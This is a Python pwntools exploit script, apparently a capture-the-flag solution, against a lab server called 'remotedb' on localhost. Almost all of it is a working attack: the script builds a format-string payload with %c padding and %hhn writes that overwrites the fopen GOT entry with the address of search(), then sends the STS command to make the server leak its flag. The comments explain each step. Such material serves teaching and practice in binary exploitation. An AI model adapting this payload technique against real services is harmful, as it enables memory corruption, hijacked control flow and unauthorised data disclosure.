#!/usr/bin/python3
from pwn import *

# remotedb contains a format string vulnerability in the error() function: the
# attacker-controlled 'buf' is passed as the format argument of fprintf().
# This vulnerability can be used to overwrite the server memory, using the %n
# format specifier.
#
# The solution below is written for a different version of the server, where
# the filedb and licencedb variables are constant. If they are not constant
# there is a much simpler solution, which consists in letting filedb point to
# the licencefile. This can be accomplished by overwriting just the lsb of
# filedb.


# We use the pwntools library which, among other things, allows us to look up
# the symbols in the ELF file programmatically and contains some very useful
# functions to interact with local and remote programs.

elf = context.binary = ELF("remotedb")
io = remote('localhost', 10000)

# skip the header
io.recvline()
io.recvline()
io.recvline()
io.recvline()

# by probing the server with 'AAA %lx.%lx.' and so on, we can see
# that the format string is reached when the fprintf argument pointer is 14
off = 14

# the idea is to overwrite the GOT entry of fopen() with a pointer to the
# search() function, thus replacting
#
#   fopen(licencefile, "r")
#
# with
#
#   search(licencefile, "r")
#
# Then the STS command will end up calling
#
#   grep -E r licencefile
# 
# which returns the lines of licencefile that contain an 'r'.
# Since the licencefile always contains an 'r' (as we can see from the
# code of do_status) the grep command will print the flag.

# address that we want to write into the fopen() GOT entry
targ = elf.sym.search

# start the line with any letters different from STS and FND, to cause
# remotedb to call error()
p = b'XXX '
# we write the address of search() one byte at a time, using the %hhn format
# specifier. Between each %hhn and the next we need to adjust the output
# counter. We use the %c specifier for this purpose, with a suitable width
# field.

# We need the addresses of the four bytes of the fopen pointer in the GOT to
# feed the four %hhn specifiers.  The addresses alternate with four garbage
# 'A' bytes to feed the %c specifiers.
for i in range(4):
    p += b'A'*4
    p += p32(elf.got.fopen + i)
n = len(p)          # bytes output so far
p += b'%c' * off    # move the argument pointer to the start of on-stack
                    # copy of the format string
n += off            # off more bytes have been output (one for each %c)
# now create the sequence of four %Wc%hhn specifier, computing the Ws that
# produce the 'targ' address
for i in range(4):
    m = targ & 0xFF
    # if we have already output more bytes than needed, let the width overflow
    if m < (n & 0xFF):
        m += 256
    p += b'%'+str(m - (n & 0xFF)).encode()+b'c'
    n = m   # new output counter
    p += b'%hhn'
    targ >>= 8  # move to next byte
# add a newline to let fgets() return
p += b'\n'
log.info(p)
# if we have added any null byte we are out of luck
if b'\0' in p:
    log.error("the payload contains null bytes")
    sys.exit()
# send the payload and overwrite the GOT
io.send(p)
io.recvline()
# now trigger the call to do_status()
io.send(b'STS\n')
log.info(b"flag: " + io.recvline())
